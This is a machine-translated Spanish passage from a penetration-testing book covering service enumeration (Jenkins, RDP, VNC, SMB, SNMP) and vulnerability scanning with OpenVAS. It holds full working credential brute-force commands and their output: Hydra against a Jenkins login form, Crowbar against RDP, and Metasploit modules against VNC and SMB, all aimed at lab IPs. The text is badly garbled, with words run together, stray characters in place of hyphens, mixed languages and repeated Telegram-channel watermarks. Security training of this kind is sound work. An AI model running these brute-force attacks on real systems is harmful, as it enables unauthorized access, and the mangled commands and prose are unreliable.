repositorio) .A continuación, itwillcompilethesourcecodefetchedfromtherepositoryand runsomeautomatedtests (por ejemplo, unittests, regressiontests, forsecurity staticcodeanalysis, etc.) Ifallthetestspasswithoutanyfailures, thenitdeploysthe sourcecodetothedevelopmentserver (dedicatedtodevelopers) Server andtheQA (dedicatedtoQAanalysts) aswell.ThewebportalthatmanagesJenkins willbelisteningonHTTPport8080bydefault.Also, Jenkinswillbelistening onTCPport50000;. thisportisusedtoconnectamasternodetooneormultiple slaveinstances.Toaccessthewebportal, necesitará credenciales válidas para poder ingresar y realizar cambios. Durante la fase de enumeración, debe buscar dos cosas: Credenciales de fuerza bruta Identificarsilaversióninstaladaesexplotable Hasta el día de hoy, no teníamos un script Nmap dedicado para Jenkins (quizás en el futuro). Sin embargo, si usamos nuestro escaneo de scripts básico habitual mediante Nmap, identificará que Jenkins se está ejecutando en el puerto 50000. Por otro lado, Nmap reconoció el puerto 8080 como servidor web, pero no pudo decodificar lo que se ha alojado en ese servidor web Jetty: root@kali:~#nmapÿsVÿsCÿOÿT5ÿp8080,50000172.16.0.103 InicioNmap7.80(https:// nmap.org)en2020-06-1509:16EDT Nmapscanreportfor172.16.0.103 Hostisup(0.00065latencia) . VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 8080/tcpopenhttpJetty9.2.zÿSNAPSHOT |httprobots.txt:1entrada no permitida|_/ |_http-serverheader:Jetty(9.2.z-SNAPSHOT) |_http-title:El sitio no tiene un título(text/html;charset= UTF-8). 50000/ tcpopenhttpJenkinshttpd2.60.3 |_http-server-header:172.17.0.2 |_http-title:El sitio no tiene un título(texto/normal;juego de caracteres=UTF-8). Dirección MAC: 00: 0C: 29: 96: F8: 6C (VMware) Advertencia: Los resultados de OSScan pueden no ser confiables porque no pudimos encontrar al menos 1 puerto abierto y 1 cerrado Suposiciones de SO agresivo: Linux 2.6.32 (96 %), Linux 3.2-4.9 (96 %), Linux 2.6.32-3.10 (96 %), Linux 3.4-3.10 (95 %), Linux 3.1 (95 %) ,Linux3.2(95%),cámara de red AXIS210Aor211(Linux2.6.17) (94 %), SynologyDiskStationManager5.2-5644 (94 %), NetgearRAIDiator4.2.28 (94 %), Linux2.6.32-2.6.35 (94 %) Canal de Telegram : @IRFaraExam Machine Translated by Google No hay coincidencias exactas del sistema operativo para el host (condiciones de prueba no ideales). Distancia de red: 1 salto […] Cuando esto sucede (ver el puerto 50000 abierto), podemos ir directamente al portal web (Figura 6.1). La segunda etapa consiste en prepararse para el ataque de fuerza bruta . En un portal web , deberá comenzar con aran y el nombre de usuario y la contraseña para identificar el mensaje de error que se mostrará después de un inicio de sesión fallido . Figura 6.1 JenkinsWebPortal Figura 6.2 Mensaje de error de Jenkins Fuerza bruta en un portal web mediante el uso de Hydra Canal de Telegram : @IRFaraExam Machine Translated by Google En la sección anterior, necesitábamos acceder al portal web de Jenkins. Ahora aprenderá cómo usar fuerza bruta en cualquier portal web usando Hydra (no solo Jenkins). Podemos seguir este proceso cada vez que queramos usar fuerza bruta en una página web: 1.Abralapáginadeinicio de sesión. 2. Habilite el proxy en Burp y el navegador. 3. Ingrese credenciales válidas y envíe los datos (usando el botón Enviar). 4. Intercepte la solicitud mediante el proxy Burpp y envíela al repetidor. 5. Extraiga los siguientes cuatro elementos: ODIO campo de nombre de usuario Campo de contraseña Mensaje de error NOTA Consulte siempre el sitio del fabricante (solo busque en Google el número de modelo o el nombre del portal web) para obtener el nombre de usuario y la contraseña predeterminados. Muchos administradores del portal web mantienen las credenciales predeterminadas, por lo que no tiene que forzar su entrada. Este es un ejemplo de un sitio web atractivo que mantiene un inventario de las credenciales predeterminadas: datarecovery.com/rd/default-passwords/ . Paso 1: habilite un proxy Primero, necesitamos habilitar un proxy en el navegador web. Tenga en cuenta que el proxy Burp estará escuchando en el puerto 8080 en el host Kali . No se confunda con el puerto 8080 que usa el servidor web Jenkins. Podemos usar el navegador Firefox en nuestro host Kali. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 6.3 Configuración de red de Firefox Ahora, seleccione el botón de opción proxy y asegúrese de configurar lo siguiente: Establezca HTTPProxy en 127.0.0.1. Establezca Puerto en 8080 (ese es el puerto de Burppproxy y no de Jenkins). Seleccione la opción Usar este servidor proxy para todos los protocolos. Haga clic en Aceptar para guardar la configuración. A continuación, abra Burp Suite desde el menú Kalimenu, como se muestra en la Figura 6.4. Figura 6.4 KaliMenu ÿBurpSuite Deberá hacer clic en el botón Siguiente varias veces al principio cuando inicie Burp Suite. Una vez que la aplicación esté cargada, haga clic en la pestaña Proxy y verá que el botón Interceptar está habilitado en la subpestaña Interceptar, como se muestra en la Figura 6.5. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 6.5 BurpSuiteProxy Paso 2: interceptar la solicitud del formulario Vuelva al formulario de inicio de sesión de Jenkins, ingrese algunas credenciales aleatorias y haga clic en el botón de inicio de sesión. Una vez que envíe el formulario, cambie a la sección Intercepción de BurpSuite y debería poder ver su solicitud. Figura 6.6 BurpSuite –SendtoRepeater Cuando esté en el repetidor, visualizará la solicitud. (Yo siempre trabajo en el Canal de Telegram : @IRFaraExam Machine Translated by Google sección de repetidor para enviar mis cargas útiles web; es una de mis pestañas favoritas en Burp Suite.) Paso 3: Extracción de datos de formulario y fuerza bruta con Hydra Para preparar las cosas con anticipación para Hydra, deberá extraer tres hallazgos: URLruta: /j_acegi_security_check(verifiquelaprimeralíneaen la Figura 6.7) Figura 6.7 POSTContenido Contenido del formulario POST: j_username=prueba&j_contraseña=prueba&de=%2F&Jenkinsÿ Crumb=6a3b8d2a8000e1aaea8566f6cec42658&json=%7B%22j_username%22%3A+% Crumb%22%3A+%226a3b8d2a8000e1aaaea8566f6cec42658%22%7D&Enviar=iniciar sesión (compruebe el texto resaltado en la Figura 6.7) Mensaje de error: información de inicio de sesión no válida (consulte la figura 6.2) Este es el comando de Hydra para una fuerza bruta HTTP POST: $hydra-l[nombre de usuario]-f-ensr-P[archivo de contraseñas]-s[número de puerto] [Dirección IP]http-post-form"[Ruta URL:POSTFormContents:Error Mensaje]" Antes de continuar, el valor del nombre de usuario debe cambiarse de prueba a ^USUARIO^ , y el valor de la contraseña, que es prueba y debe cambiarse a ^PASS^ . El valor final del contenido del formulario POST debe tener este aspecto : j_username=^USUARIO^&j_password=^PASS^&from=%2F&Jenkins Crumb=6a3b8d2a8000e1aaea8566f6cec42658&json=%7B%22j_username%22%3A+%22test%22% Canal de Telegram : @IRFaraExam Machine Translated by Google <!--<ce:anchorid="pp:150np:151"role="page-break"/>-- >2F%22%2C+ %22Jenkinsÿ Crumb%22%3A+ %226a3b8d2a8000e1aaea8566f6cec42658%22%7D&Submit=log+ en Es hora de comenzar a ejecutar nuestro ataque de fuerza bruta: hydraÿladminÿfÿensrÿP/opt/SecLists/Passwords/darkweb2017ÿ top100.txtÿ s8080172.16.0.103httpÿpostÿform"/ j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Jenkinsÿ Crumb=6a3b8d2a8000e1aaea8566f6cec42658&json=%7B%22j_username%22%3A+%22test%22% Crumb%22%3A+%226a3b8d2a8000e1aaea8566f6cec42658%22%7D&Submit=log+in:Invalid logininformation" […] [DATA] attackinghttp-post formulario: //172.16.0.103: 8080 / j_acegi_security_check: j_username = ^ USUARIO ^ & j_password = ^ Crumb = 6a3b8d2a8000e1aaea8566f6cec42658 y json =% 7B% 22j_username% 22% 3A +% 22test% 22% Crumb% 22% 3A +% 226a3b8d2a8000e1aaea8566f6cec42658 %22%7D&Submit=log+in: Información de inicio de sesión no válida [8080][httpÿpostÿform]host:172.16.0.103login:adminpassword:admin [STATUS]ataquefinalizadopara172.16.0.103(par válido encontrado) 1 de 1 objetivo completado con éxito, 1 contraseña válida Parece que tenemos un candidato exitoso, admin:admin. Protocolos web80/443 Las aplicaciones web lo son todo en estos días; es por eso que existe un capítulo dedicado que se enfoca en la enumeración y explotación de aplicaciones web. HTTPTCPport80: Sirve para solicitudes y respuestas web en texto sin cifrar. Si rastrea la red de un sitio web que sirve en el puerto 80, podrá ver las credenciales de inicio de sesión en texto sin cifrar. Puerto HTTPS/TLSTCP 443: este protocolo seguro del protocolo HTTP se llama HTTPS o TLS. La comunicación es segura, por lo que el niffer no podrá ver el tráfico a menos que haya un proxy que lo intercepte. Canal de Telegram : @IRFaraExam Machine Translated by Google NOTA Los portales web como Jenkins, por ejemplo, no utilizan el número de puerto predeterminado 80 para evitar conflictos con la aplicación web predeterminada alojada en el mismo servidor web. Protocolos de comunicación remota gráfica Conectarse de forma remota a la interfaz gráfica de usuario de Windows y Linux se puede lograr fácilmente hoy en día. En esta sección, aprenderá cómo identificar un servicio de protocolo móvil y cómo hackearlo como los profesionales. Estas son las aplicaciones más comunes que se utilizan para este propósito: Protocolo de escritorio remoto (RDP): TCPport3389 Computación de red virtual (VNC): TCPport5900 RDP (Puerto 3389) El protocolo de escritorio remoto es la aplicación común utilizada para conectarse de forma remota a los sistemas operativos Windows. Si está habilitado en el host remoto, los usuarios pueden conectarse a la interfaz gráfica de usuario del host de Windows. Escaneemos rápidamente un host ejecutando un servidor RDP: root@kali:~#nmapÿsVÿsCÿOÿT5ÿp3389172.16.0.104 Inicio de Nmap7.80(https://nmap.org)en2020-06-1610:04EDT Nmapscanreportfor172.16.0.104 Hostisup(0.00056latencia) . PORTSTATESERVICEVERSION 3389/tcpopenmsÿwbtÿserverMicrosoftTerminalServices |rdp-ntlm-info:| Target_Name:KCORP |NetBIOS_Domain_Name:KCORP | NetBIOS_Computer_Name:WINDOWS10LAB |DNS_Domain_Name:KCorp.local |DNS_Computer_Name:Windows10Lab.KCorp.local | DNS_Corp.Tree_Name:KCorp.local |DNS_Tree_Name: 10.0.17763 | _System_Time:2020-06-16T14:04:26+00:00 |sslcert:Subject:commonName=Windows10Lab.KCorp.local Canal de Telegram : @IRFaraExam Machine Translated by Google […] Fuerza bruta RDP El protocolo RDP es lento, e Hydra no funciona en el protocolo RDP. Por otro lado, Crowbar ha demostrado que es ligeramente mejor que Hydra cuando se trata de fuerza bruta del servicio RDP. Veamos un ejemplo práctico de fuerza bruta del mismo servidor que enumeramos anteriormente usando Crowbar (tiene que instalarlo primero usando aptinstall crowbar-y ): root@kali:/# crowbarÿbrdpÿs172.16.0.104/32ÿuadminÿC/root/pass.txt 2020-06-1614:08:26INICIO 2020-06-1614:08:26Crowbarv0.4.1 2020-06 -1614:08:26Intentando172.16.0.104:3389 2020-06-1614:08:26RDP-ÉXITO:172.16.0.104:3389admin:Contraseña123! 2020-06-1614:08:26DETENER VNC (Puerto 5900) La computación en red virtual (VNC) es otro servicio popular que se usa con fines remotos. VNC se usa comúnmente en hosts Linux con una interfaz gráfica de usuario (por ejemplo, GNOME) y usa el puerto TCP 5900 de manera predeterminada. nmapÿsVÿT5ÿp5900ÿÿscript=vnc*172.16.0.101 Iniciando Nmap7.80(https:// nmap.org)a las 2020-06-1615:14EDT Nmapscanreportfor172.16.0.101 Hostisup(0.00025slatency). VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 5900/tcpopenvncVNC(protocolo 3.3) |vnc-brute:| Cuentas:Novalidaccountsfound | Estadísticas:Realizadas15conjeturasen1segundos,averagetps:15.0 |_ERROR:Toomanyauthenticationfailures |vnc-info:|Protocolversion:3.3 |Securitytypes:| _VNCAuthentication(2) […] Canal de Telegram : @IRFaraExam Machine Translated by Google Nmap no nos muestra mucho; solo pudimos detectar la versión de VNC. Para la fuerza bruta de VNC, usaremos Metasploit. (En el pasado he tenido resultados más exitosos con el módulo de Ms en lugar de Hydra). Tenga en cuenta que no necesita un nombre de usuario para descifrar una cuenta de VNC. Todo lo que necesita es una contraseña: msf5> useauxiliary/scanner/vnc/vnc_login msf5auxiliary(scanner/vnc/vnc_login)> setRHOSTS172.16.0.101 RHOSTS=>172.16.0.101 msf5auxiliary(scanner/vnc/vnc_login)> setVERBOSEfalse VERBOSE=>false msf5auxiliary(scanner/vnc/vnc_login) )> establecer STOP_ON_SUCCESStrue STOP_ON_SUCCESS=>true msf5auxiliary(scanner/vnc/vnc_login)> ejecutar [*]172.16.0.101:5900-172.16.0.101:5900-StartingVNCloginsweep [+]172.16.0.101:5900ÿ 172.16.0.101:5900ÿLoginSuccessful::password [*]172.16.0.101:5900Scanned1of01%hostcomplete(10) […] Protocolos para compartir archivos Los protocolos ServerMessageBlock (SMB) y NetBIOS son el corazón del uso compartido de archivos en los sistemas operativos Microsoft Windows. Samba no solo se usa en el sistema operativo Windows, sino que se usa ampliamente en los sistemas operativos Linux para compartir archivos y para servicios de impresión. SMB (Puerto 445) El protocolo SMB funciona en el puerto TCP 445 y, una vez habilitado, verá que el puerto NetBIOSTCP 139 también está abierto. El proceso de enumeración de un protocolo SMB debe tener como objetivo los siguientes elementos: Nombres compartidos Lista de usuarios listadegrupos Nombre de dominio cuentas de fuerza bruta Canal de Telegram : @IRFaraExam Machine Translated by Google Lista de versiones vulnerables de SMB Un análisis rápido de Nmaps debería revelar información básica sobre el host de destino: root@kali:~# nmapÿsVÿT5ÿp445ÿsC172.16.0.106 A partir de Nmap7.80(https://nmap.org) a las 2020-06-1809:36EDT Nmapscanreportfor172.16.0.106 Hostsup (0.00072 latencia). VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 445/tcpopenmicrosoftÿdsWindows10Pro10240microsoftÿds (grupo de trabajo: KCORP) Dirección MAC: 00: 0C: 29: 87: 09: 90 (VMware) ServiceInfo: Host: WINDOWS10LAB02; SO: Windows; CPE: cpe: / o: microsoft: windows Resultados de la secuencia de comandos del host: |_reloj sesgado:media:2h19m59s,desviación:4h02m29s,mediana:0s | _nbstat:NetBIOSname:WINDOWS10LAB02,NetBIOSusuario:<desconocido>,NetBIOSMAC:00:0c:29:87:09:9 |smb-os-discovery:| OS:Windows10Pro10240(Windows10Pro6.3) |OSCPE:cpe:/o:microsoft:windows_10 ::|Nombre del equipo:Windows10Lab02 |Nombre de equipo NetBIOS:WINDOWS10LAB02\x00 |Nombre de dominio:KCorp.local |Nombre del bosque:KCorp.local |FQDN:Windows10Lab02.KCorp.local |_Hora del sistema:2020-06-18T06:36:19-07:00 |modo-seguridad-smb:| cuenta_usada:invitado |authentication_level:usuario |desafío_respuesta:compatible |_message_signing: deshabilitado (peligroso, pero predeterminado) |smb2-security-mode:|2.02:| _Messagesigninghabilitadoperonorequerido |smb2-time:|| fecha:2020-06-18T13:36:19 _start_date:2020-06-18T13:32:18 A continuación, podemos ejecutar un análisis de vulnerabilidades mediante un análisis de secuencias de comandos Nmap para ver si podemos obtener más información (no usé smb*, porque requiere mucho tiempo y agresivo): root@kali:~# nmapÿsVÿp445ÿÿscript=smbÿvuln*172.16.0.106 A partir de Nmap7.80(https://nmap.org) a las 2020-06-1810:27EDT Canal de Telegram : @IRFaraExam Machine Translated by Google Nmapscanreportfor172.16.0.106 Hostsup (0.00025 latencia). PUERTO SERVICIO ESTATAL VERSIÓN 445/tcpopenmicrosoft-dsMicrosoftWindows7-10microsoft-ds(grupo de trabajo:KCORP) Dirección MAC: 00: 0C: 29: 87: 09: 90 (VMware) ServiceInfo: Host: WINDOWS10LAB02; SO: Windows; CPE: cpe: / o: microsoft: windows Resultados de la secuencia de comandos del host: |_smb-vuln-ms10-054: falso |_smb-vuln-ms10-061:NT_STATUS_ACCESS_DENIED |smbÿvulnÿms17ÿ010: |VULNERABLES: |Vulnerabilidad de ejecución remota de código en servidores Microsoft SMBv1 (ms17-010) |Estado:VULNERABLE |ID:CVE:CVE-2017-0143 | Factor de riesgo: ALTO | Existe una vulnerabilidad crítica de ejecución remota de código en Microsoft SMBv1 |servidores (ms17-010). ||Fecha de divulgación:2017-03-14 |Referencias: |https://technet.microsoft.com/en-us/library/security/ms17010.aspx |https://blogs.technet.microsoft.com/msrc/2017/05/12/guía para el cliente para los ataques de Wannacrypt/ |_https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 Detección de servicio realizada. Informe cualquier resultado incorrecto en https://nmap.org/ submit/. Nmapdone: 1 dirección IP (1 host up) escaneada en 11,49 segundos Probaremos si el host remoto es vulnerable a los toms 17-010 en el Capítulo 7. Para el momento, solo estamos recopilando información (podría ser un falso positivo; no contar con la precisión de los resultados que estamos reuniendo en esta fase). Tenga en cuenta que puede usar la opción de secuencia de comandos smb-enum para agregar más resultados de enumeración al resultados: root@kali:~#nmap-sV-p445--script=smb-enum172.16.0.106 Si desea explorar más herramientas para este propósito, lo invito a probar también la utilidad Enum4LinuxSMBenumeration: Canal de Telegram : @IRFaraExam Machine Translated by Google $enum4linux-a[dirección IP] Fuerza brutaSMB Podemos usar el módulo auxiliar Metasploit smb_login en lugar de Hydra para el protocolo SMB porque da menos falsos positivos y proporciona un mejor rendimiento. Para obtener un buen resultado, puede modificar las opciones de su escáner porque no quiere quemar gas por nada. msf5> useauxiliary/scanner/smb/smb_login msf5auxiliary(scanner/smb/smb_login) >setBLANK_PASSWORDStrue BLANK_PASSWORDS= >true msf5auxiliary(scanner/smb/smb_login) >setPASS_FILE/ usr/share/wordlists/rockyou.txt PASS_FILE= >/usr/share /wordlists/rockyou.txt msf5auxiliary(scanner/smb/smb_login) >setRHOSTS172.16.0.106 RHOSTS= >172.16.0.106 msf5auxiliary(scanner/smb/smb_login) >setSMBUseradmin SMBUser= >admin msf5auxiliary(scanner/smb/smb_login) >setSTOP_ON_SUCCESS STOP_ON_SUCCESS= >true msf5auxiliary(scanner/smb/smb_login) >setTHREADS100 THREADS = >100 msf5auxiliary(scanner/smb/smb_login) >setUSER_AS_PAStrue USER_AS_PASS= >true msf5auxiliary(scanner/smb/smb_login) >setVERBOSEfalse VERBOSEner= >false msf5aux smb/smb_login) >ejecutar [+]172.16.0.106:445'. \admin:admin' [*]172.16.0.106:445[*]Ejecución del módulo auxiliar completada msf5auxiliary(scanner/smb/smb_login) > -172.16.0.106:445-Éxito: - Escaneado 1 de 1 hosts (100 % completo) SNMP (PuertoUDP161) El protocolo simple de administración de red es una base de datos que almacena información de hosts/dispositivos de red (para fines de administración de red). La base de datos de información SNMP se llama Base de información de administración (MIB) y estructura los datos en un árbol. Canal de Telegram : @IRFaraExam Machine Translated by Google puede usar las tres cadenas comunitarias siguientes para conectarse al servidor SNMP: Público Privado Gerente SNMPEnumeración Si pudo enumerar el servidor SNMP, verá muchos información importante sobre el host de destino: Interfaces de red Puertos de escucha Procesos del sistema Hosthardwareinformación Software instalado Usuarios locales Carpetas compartidas Nmap es mi herramienta favorita para el proceso de enumeración. Entonces, para el SNMP protocolo, usaré de nuevo Nmap para hacer el trabajo. Tome nota de que usaré el opción sU porque estoy apuntando a un puerto UDP (la salida es grande, por lo que seré truncando algunos resultados): raíz @ kali: # nmap-sU-p161-sV-sC-T5172.16.0.100 A partir de Nmap7.80(https://nmap.org) a las 2021-01-0512:39 EST Nmapscanreportfor172.16.0.100 Hostsup (0.00038 latencia). VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 161/udpopensnmp| servidor SNMPv1 (público) interfaces snmp:| SoftwareLoopbackInterface1\x00 |Dirección IP:127.0.0.1Máscara de red:255.0.0.0 |Tipo:softwareVelocidad de bucle invertido:1 Gbps |Estadísticas de tráfico:0,00 Kb enviados, 0,00 K recibidos |Minipuerto WAN(SSTP)\x00 |Tipo:túnelVelocidad:1Gbps |Estadísticas de tráfico:0,00 Kb enviados, 0,00 K recibidos […] |snmp-netstat: Canal de Telegram : @IRFaraExam Machine Translated by Google |TCP0.0.0.0:135| TCP0.0.0.0:3389| TCP0.0.0.0:49152[…] 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 |procesos snmp:|1:|||||| Ruta: \SystemRoot\System32\ Nombre: SystemIdleProcess 4: Nombre:Sistema 264: Nombre: smss.exe |356:| Nombre:csrss.exe |Ruta:%SystemRoot%\system32\ | Params:ObjectDirectory=\WindowsSharedSection=1024,20480,768Windows=OnSubSystemType=WindowsServer […] Nmap hizo un gran trabajo al mostrar toda la información. De hecho, la salida es tan enorme que tomará muchas páginas, así que eliminé la mayoría de ellas para mayor claridad. La parte más importante en la salida de Nmap es la versión de este servidor SNMP (V1) y la cadena comunitaria también se usa (pública). Resumen Idealmente, disfrutó de este capítulo de enumeración. En esta fase de prueba de penetración, recopilamos toda la información sobre diferentes tipos de servicios. los datos de enumeración recopilados se utilizarán para explotar cada uno de ellos. luego, en el siguiente capítulo, aprenderá a explotar estos servicios a través de un shell remoto (y mucho más). Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 7 OperaciónFase En este capítulo, comenzará a ver algunos ataques reales y entrará en los sistemas. En el capítulo anterior, tenía toda la información sobre cada servicio, y en este, daremos un paso más y explotaremos las vulnerabilidades. Además de esto, aprenderá sobre la evaluación de vulnerabilidades en una organización típica, que será útil si desea hacer de la seguridad su carrera. En este capítulo, aprenderá sobre lo siguiente: evaluación de vulnerabilidades Investigación pública para hazañas Explotación del servicio FTP Explotación del servicio SSH Telnetservicioexplotación Explotación del servidor de correo electrónico Dockerengineexplotación Jenkinsportalexplotación conchas inversas Explotación del protocolo SMB Evaluación de vulnerabilidades Anautomatedvulnerabilitiesassessmentconsistsofusingprofessionalscanners thatfindvulnerabilitiesonaremotehostinthenetwork (ormultipleonesina subred) .Inthepreviouschapter, weusedthescriptscaninNmap.Ingeneral, mostscriptsinNmap (notallofthem) willexecutesomenecessarychecksfor vulnerabilities.Forexample, whenyourunthe FTP * scriptoption, itwillinclude thevulnerabilitiesscanninginNmap.Ifyouwanttobespecific, youcanusethe opción ftp-VULN * entorno toachievetheendresults.Notethatavulnerabilityassessment isalittlebitrelatedtopatchmanagement.Ifyouareworkinginanenterprise, youwillencounterthistaskalot, morethanpenetrationtesting Canal de Telegram : @IRFaraExam Machine Translated by Google Muchas empresas pasan por esta etapa y no proceden con la explotación de los hallazgos. En su lugar, intentan corregirlos en función del informe generado por las herramientas. En el mundo real, las empresas utilizan escáneres automáticos más avanzados, y estos son algunos ejemplos de los que se utilizan en entornos incorporados: De Tenable: Nessus y Tenable.sc (solución local) Tenable.io (solución en la nube) DeRapid7: Nexpose (una solución fuera de las instalaciones) InsightVM (solución en la nube) QualysScanner (solución en la nube) Todos estos escáneres usan el mismo concepto. Si conoce los conceptos básicos del escaneo de vulnerabilidades, podrá usar fácilmente cualquier tipo de escáner. Flujo de trabajo de evaluación de vulnerabilidades Antes de continuar, veamos la secuencia lógica para lograr una tarea de evaluación de vulnerabilidad exitosa. ¿Por qué necesita clasificar sus activos? Tengo varias respuestas para esta pregunta: Permite que el escáner ejecute tareas con precisión. Por ejemplo, el escáner tendrá una plantilla diferente para dispositivos móviles en comparación con hosts de Windows, etc. Puede priorizar la administración de parches de vulnerabilidades. Por ejemplo, una vulnerabilidad crítica en un servidor de producción es más importante que una vulnerabilidad crítica en un servidor de desarrollo de intranet. Le permite separar lógicamente sus dispositivos para fines de administración de parches. Por ejemplo, agrupar los activos le permitirá enumerar fácilmente todos los hosts en la producción cuando se lo solicite. Canal de Telegram : @IRFaraExam Machine Translated by Google Estos son los pasos: 1. Agrupe sus activos: Antes de comenzar la evaluación de vulnerabilidad, debe agrupar sus activos en diferentes categorías. Estos son algunos ejemplos: Dispositivos de red dispositivos IoT hosts de usuario Devservers Servidores de preproducción Servidores de producción de Windows Servidores de producción Linux Telefonía/VoIP tabletasyteléfonos 2. Gestión de acceso: Otro requisito previo para el análisis de vulnerabilidades es dar acceso al escáner para ejecutar sus funcionalidades. En otras palabras, el analizador de vulnerabilidades no podrá escanear correctamente si no tiene el permiso correcto en el host de destino. Esto es lo que deberá hacer por su parte: a.CreeunacuentapersonalizadaparahostsLinux.ElescánerusaráSSHpara autenticar. b.CreeunacuentapersonalizadaparaloshostsWindows.Luego,elescánerutilizaráelprotocoloSambaparaautentica c. Instale un agente en cada host de destino. La mayoría de los escáneres basados en la nube requerirán que use este patrón. El agente escaneará los servicios en cada host y enviará los resultados al nodo principal. Además, el agente se ejecutará localmente en el host, por lo que los resultados serán más precisos. 3. Cree escaneos: después de realizar los dos pasos anteriores, puede comenzar a crear Cada proveedor ofrecerá diferentes plantillas para escanear. Por ejemplo, tendrá una plantilla para escanear un dispositivo móvil. Canal de Telegram : @IRFaraExam Machine Translated by Google ha identificado y agrupado sus activos correctamente, entonces este paso debería ser fácil de implementar. 4. Informe: Thelaststeptoachieveasuccessfulvulnerabilityassessmentisthe reportingstep.Again, ifyoudidyourjobcorrectlyandsegmentedyour assetsandscans, thenthereportingpartshouldnotbeahassle.Reportswill havefalsepositives; yourjobistoidentifythembeforereportingto management.Foralarge-scalenetwork, youwillbesurprisedaboutthe numberofvulnerabilitiesthatyouwillfind.Insomecompanies, que requiresecurityanalyststore-assessthescoreofthesecurityrisk (vulnerabilidad ofeach) toreducethefalsepositivesandreportamoreaccurateresult. Exploración de vulnerabilidades con OpenVAS Es hora de practicar con algunos ejemplos del mundo real utilizando el escáner de vulnerabilidades gratuito Open VAS. Esta sección tiene fines prácticos únicamente, pero en el mundo real, muchas grandes empresas invierten dinero en costosos escáneres de vulnerabilidades profesionales (como los que mencioné anteriormente). El mismo concepto se aplica a otro escáner llamado Open VAS; ¡comencemos! InstallingOpenVAS Kalite siempre cambia la situación con respecto a Open VAS en diferentes distribuciones. En otras palabras, a veces probablemente vea Open VAS preinstalado, y en algunas otras distribuciones, no. En la distribución actual de 2020, no está preinstalado. Para instalarlo, haga lo siguiente: root@kali:~# aptupdate root@kali:~# aptinstallopenvasÿy root@kali:~# openvasÿsetup Una vez que el último comando haya terminado de ejecutarse, no cierre la ventana de su terminal. La instalación mostrará su contraseña para iniciar sesión dentro del portal web. En la muestra de salida, verá que se generó una contraseña; en su extremo, la contraseña será diferente: [>]Comprobando el usuario administrador [*]Creando el usuario administrador Usuario creado con contraseña '0223982d-1935-4053-a300-7b2843f2ab61'. [+]Terminado Para acceder al portal web, abra su navegador en el siguiente enlace, como se muestra en la Figura 7.1. (Utilice las credenciales que obtuvo anteriormente. Además, asegúrese de guardar Canal de Telegram : @IRFaraExam Machine Translated by Google la contraseña para su uso posterior.) https://127.0.0.1:9392/iniciar sesión/iniciar sesión.html Figura 7.1 OpenVASWebPortal NOTA Si reinició su host, el servidor OpenVAS se apagará eventualmente y debe iniciar el servicio nuevamente con el siguiente comando: root@kali:~#openvas-inicio Escaneo con OpenVAS Aquí está el flujo de trabajo que usaremos para escanear usando Open VAS: 1. Cree un grupo de conjuntos para escanear hosts de Windows. (En Open VAS, se llama objetivos.) 2. Utilice una cuenta SMB de Windows para permitir que el escáner inicie sesión en el host de destino. Canal de Telegram : @IRFaraExam Machine Translated by Google 3. Cree una tarea para escanear los objetivos de host identificados anteriormente. 4. Runthescan. 5. Verifique el informe después de completar el escaneo. Crear una lista de objetivos En el menú, seleccione el elemento Configuración y, a continuación, haga clic en Objetivos. Una vez que esté en la página, haga clic en el pequeño botón de estrella azul para crear un nuevo objetivo. En la versión más reciente de la aplicación, el botón está ubicado a la izquierda de la pantalla, como se muestra en la Figura 7.2. Figura 7.2 OpenVASNewTarget Se abrirá una nueva ventana de destino en blanco. En esta etapa, debemos agregar la siguiente información (consulte la Figura 7.3): Proporcione al grupo de activos (objetivos) un nombre y una descripción. Canal de Telegram : @IRFaraExam Machine Translated by Google Especifique las direcciones IP de las máquinas host. Opcionalmente, identifique la cuenta SMB (si desea un escaneo autenticado). Especifique los intervalos de números de puerto que desea utilizar para estos tipos de activos. CreateaScannerTask Para crear una tarea de escáner, seleccione el menú Escanear y luego haga clic en el elemento Tarea. Una vez más, haga clic en el pequeño botón de estrella azul para crear una nueva tarea. Una vez que la ventana esté cargada, deberá proporcionar la siguiente información (consulte la Figura 7.4): Proporcione el nombre y la descripción de la tarea. Seleccione el nombre del objetivo del grupo; aquí está Scan Targets. En Scan Config, elija el tipo de escaneo (rápido o profundo y lento). Figura 7.3 Opciones de OpenVASTarget Una vez que haya creado la tarea, podrá unirse a la página de tareas mediante Canal de Telegram : @IRFaraExam Machine Translated by Google haciendo clic en el botón verde de reproducción, debajo de la columna Acciones (consulte la Figura 7.5). Una vez que el escáner haya terminado, el estado será Listo. Para actualizar los resultados automáticamente, deberá configurar el tiempo de actualización en la lista desplegable superior derecha (junto al nombre de usuario que ha iniciado sesión). Revisión del informe Una vez que el escáner haya terminado la tarea de escaneo, puede visualizar el informe seleccionando Escaneos ÿ Informes. En la página de informes, haga clic en el enlace debajo de la columna Fecha. (Si tiene varios escaneos, debe seleccionar la tarea correcta). Debería ser redirigido a los resultados del informe (consulte la Figura 7.6). Figura 7.4 Opciones de OpenVASTask Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 7.5 OpenVASRunATask Figura 7.6 Resultados del informe OpenVAS ¿Qué sigue? Su trabajo en esta etapa es probar cada vulnerabilidad y validar si es explotable o no (evitando falsos positivos). Investigación de exploits Hasta ahora, ha visto cómo enumeramos y buscamos vulnerabilidades. En esta etapa, necesitamos investigar cada vulnerabilidad encontrada que pueda explotarse mediante una búsqueda pública. En un entorno profesional, una empresa utiliza principalmente las siguientes: Canal de Telegram : @IRFaraExam Machine Translated by Google MetasploitPro (no la versión gratuita) CoreImpact También existen otras herramientas para este propósito, pero estas son las más populares. Estas herramientas no son gratuitas y tienen un precio, pero una empresa debe tenerlas para ahorrar tiempo y esfuerzos inútiles. No siempre tiene acceso a estas herramientas (dependiendo del cliente con el que esté trabajando). En su lugar, podemos seguir este patrón: 1.Compruebe si hay un exploit en Metasploit (edición comunitaria). 2. Si el exploit no está en Metasploit, use el motor de búsqueda de Google para ingresar el nombre del exploit que está buscando: Puede usar exploit-db.com si aparece en la parte superior de la búsqueda. También puede utilizar GitHubi si el exploit no aparece en exploitÿdb . Tomemos un ejemplo práctico de una de las 